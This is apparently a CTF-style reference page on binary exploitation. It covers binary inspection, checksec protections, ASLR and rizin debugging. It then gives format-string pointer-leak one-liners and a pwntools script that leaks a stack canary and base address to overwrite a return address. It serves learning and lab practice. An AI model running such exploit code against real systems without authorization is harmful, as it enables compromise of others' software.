Exploit Notes
Exploit Notes

Exploits related to Binary Exploitation

Others

Binary Exploitation
Binary Exploitation with Buffer Overflow
Binary Exploitation with Canary Bypass
Binary Exploitation with GOT
Binary Exploitation with ROP
Binary Exploitation with Time Guessing
Binary Exploitation with ret2libc
Binary Exploitation with ret2plt

Binary Exploitation

Last modified: 2023-03-20

Reverse Engineering

Binary Exploitation is the process of finding vulnerabilities in the binary file.

Prerequisites

This post uses “rizin” for dynamic analysis.
And “pwntools” python package is useful for binary exploitation.


Investigation

Basic

file ./example
strings ./example

objdump -d ./example
# -M: type
objdump -M intel -d ./example

Security Properties

First check the executable properties.

checksec --file=./example

  • RELRO (stands for Relocation Read-Only)

    • Partial RELRO - We can read/write the global offset table.
    • Full RELRO - We can only read the global offset table. So we cannot overwrite GOT.

  • STACK CNARY

    • No canary found - It’s vulnerable to buffer overflow.

  • NX (stands for Non-eXecutable segments)

    • NX enabled - We cannot execute custom shellcode from the stack.

  • PIE (stands for Position Independent Executable)

    • No PIE - The binary always starts at same address.

ASLR (Address Space Layout Randomization) in Machine

ASLR is a security technique involved in preventing exploitation of memory corruption vulnerabilities.

cat /proc/sys/kernel/randomize_va_space
2
  • 0 - The address space is NOT randomized.
  • 1 - The address space is randomized.
  • 2 - The address space is randomized, and data segment as well.

Debugging

1. Start Debugger

# Change permission for debugging
chmod +x example

# -d: Debug mode
rizin -d example

2. Analyzing

# Analyze all calls, references, emulation and applies signatures
[0x0000]> aaa

3. List functions

# List functions
[0x0000]> afl
[0x0000]> afl | grep main

4. Disassemble & Decompile Functions

# Disassemble the function
[0x0000]> pdf @ main
[0x0000]> pd @ main
# Disassemble the first 50 lines
[0x0000]> pd 50 @ main

# Decompile the function (the ghidra plugin required)
[0x0000]> pdg @ main

If you want to decompile using “pdg” command as above, you need to install the “rizin-plugin-ghidra” so install it by running the following command.

sudo apt install rizin-plugin-ghidra

Format String (Pointer)

./example

Type something:
>> %2$p
The result is 0x555a18ae6365

Exploitation Examples

# Brute force pointer
for i in {20..-1}; do echo \%$i\$p | ./example; done

# Brute force pointer & cut & hexdump (reverse) & reverse
# cut -c 15-: Select only N characters (e.g. 15 characters)
# xxd -ps: Output in plain hexdump style
# xxd -r: Reverse operation. Convert hexdump into binary
# rev: Reverse lines characterwise
(for i in {11..6..-1}; do echo \%$i\$p | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev

Bypass Canary Protection

from pwn import *
import re

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath) # p = remote('example.com', '1337') for remote connection

# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base

payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()

References

Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.